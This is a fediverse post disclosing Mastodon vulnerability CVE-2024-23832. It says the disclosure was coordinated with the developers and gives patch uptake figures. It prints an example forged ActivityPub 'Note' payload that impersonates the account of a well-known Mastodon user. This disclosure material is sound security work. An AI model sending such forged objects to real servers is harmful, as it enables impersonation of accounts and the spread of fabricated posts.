Notices where this attachment appears
-
Embed this notice
arcanicanis (arcanicanis@were.social)'s status on Friday, 16-Feb-2024 01:19:14 JST 
arcanicanis
So here’s an example of one of the maliciously-crafted payloads that resulted in a 9.8 severity CVE (CVE-2024-23832) against Mastodon:
{ "@context": ["https://www.w3.org/ns/activitystreams"], "id": "https://mastodon.social/users/Gargron/posts/123456", "type": "Note", "actor": "https://mastodon.social/users/Gargron", "attributedTo": "https://mastodon.social/users/Gargron", "content": "Well, this is an extremely concerning vulnerability I should have accounted for.", "to": [ "https://www.w3.org/ns/activitystreams#Public" ], "cc": [ "https://mastodon.social/users/Gargron/followers" ], "published": "2024-01-28T22:00:00Z" }I have previously double-checked with one of the Mastodon developers (while CC’ing the Mastodon Security email) to confirm that I’m free to release the details at this scheduled time (Feb 15th 15:00 UTC). According to the current observed metrics on FediDB, >73.6% of Mastodon instances are patched against CVE-2024-23832, as manually tabulated.
For more details on the vulnerability, the original security report as it was submitted on Github is available at: https://arcanican.is/excerpts/cve-2024-23832/
My recount of events (as well as unsolicited commentary and criticisms on the vulnerability, ecosystem, etc; when I get around to finishing it): https://arcanican.is/excerpts/cve-2024-23832/discovery.htm
GNU social JP is a social network, courtesy of GNU social JP管理人. It runs on GNU social, version 2.0.2-dev, available under the GNU Affero General Public License.
All GNU social JP content and data are available under the Creative Commons Attribution 3.0 license.